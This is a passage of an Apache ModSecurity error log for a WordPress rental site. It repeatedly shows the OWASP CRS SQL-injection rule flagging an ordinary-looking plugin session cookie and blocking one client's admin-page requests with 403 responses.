[uri "/wp-admin/edit.php"] [unique_id "agIFlVV4kyjgo4bQBUiCMQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:37.116061 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFlVV4kyjgo4bQBUiCMQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:37.772105 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFlVV4kyjgo4bQBUiCMQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:38.026614 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFllV4kyjgo4bQBUiCMgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:38.026911 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFllV4kyjgo4bQBUiCMgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:38.690896 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFllV4kyjgo4bQBUiCMgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:38.998533 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFllV4kyjgo4bQBUiCNQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:38.998821 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFllV4kyjgo4bQBUiCNQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:39.588598 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFllV4kyjgo4bQBUiCNQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:39.709418 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFl1V4kyjgo4bQBUiCNgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:39.709698 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFl1V4kyjgo4bQBUiCNgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:40.267099 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFl1V4kyjgo4bQBUiCNgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:40.516376 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFmFV4kyjgo4bQBUiCNwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:40.516670 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFmFV4kyjgo4bQBUiCNwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:40.888131 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFmFV4kyjgo4bQBUiCNwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:42.007234 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFmlV4kyjgo4bQBUiCOwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:42.007514 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFmlV4kyjgo4bQBUiCOwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:42.627974 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFmlV4kyjgo4bQBUiCOwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:43.256265 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFm1V4kyjgo4bQBUiCPgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:43.256553 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFm1V4kyjgo4bQBUiCPgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:43.884116 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFm1V4kyjgo4bQBUiCPgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:44.246640 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFnFV4kyjgo4bQBUiCPwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:44.246938 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFnFV4kyjgo4bQBUiCPwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:44.867987 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFnFV4kyjgo4bQBUiCPwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:45.250223 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFnVV4kyjgo4bQBUiCQQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:45.250508 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFnVV4kyjgo4bQBUiCQQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:45.805727 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFnVV4kyjgo4bQBUiCQQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:45.934959 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFnVV4kyjgo4bQBUiCQgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:45.935257 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFnVV4kyjgo4bQBUiCQgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:46.514116 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFnVV4kyjgo4bQBUiCQgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:46.664181 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFnlV4kyjgo4bQBUiCRAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:46.664469 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFnlV4kyjgo4bQBUiCRAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:47.032737 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFnlV4kyjgo4bQBUiCRAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:47.328734 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFn1V4kyjgo4bQBUiCRgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:47.329142 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFn1V4kyjgo4bQBUiCRgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:47.977080 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFn1V4kyjgo4bQBUiCRgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:48.277265 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri 